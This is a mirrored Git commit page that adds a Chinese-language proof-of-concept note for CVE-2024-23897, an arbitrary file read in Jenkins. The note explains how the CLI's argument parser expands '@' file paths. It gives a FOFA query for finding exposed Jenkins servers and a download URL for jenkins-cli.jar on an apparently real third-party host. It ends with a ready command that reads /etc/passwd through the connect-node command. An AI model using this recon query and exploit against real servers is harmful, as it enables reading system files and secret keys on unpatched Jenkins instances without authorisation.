admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Create Jenkins任意文件读取漏洞(CVE-2024-23897).md

Browse Source
This commit is contained in:
wy876 2024-01-26 20:23:18 +08:00 committed by GitHub
parent 9b588bd9bd
commit 9d97867f57
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 23 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

23
Jenkins任意文件读取漏洞(CVE-2024-23897).md Normal file
View File

@ -0,0 +1,23 @@
## Jenkins任意文件读取漏洞(CVE-2024-23897)
Jenkins CLI 是 Jenkins 内置的命令行页面。
Jenkins 受影响版本中使用 args4j 库解析CLI命令参数该库默认将参数中 @ 字符后的文件路径替换为文件内容,攻击者可利用该特性使用 Jenkins 控制器进程的默认字符编码读取 Jenkins 控制器文件系统上的任意文件(如加密密钥的二进制文件)
## fofa
```
app="Jenkins"
```
## 根据社区公布的poc
```
https://twitter.com/shoucccc/status/1750601321831633026
```
此漏洞需要使用到jenkins-cli.jar。读者可以从任意Jenkins网页地址下载 http://129.146.32.86:8080/jnlpJars/jenkins-cli.jar
```
java -jar jenkins-cli.jar -s http://:8080/ connect-node "@/etc/passwd"
```
![image](https://github.com/wy876/POC/assets/139549762/bba2e17e-472a-4694-b877-c54c3be42a55)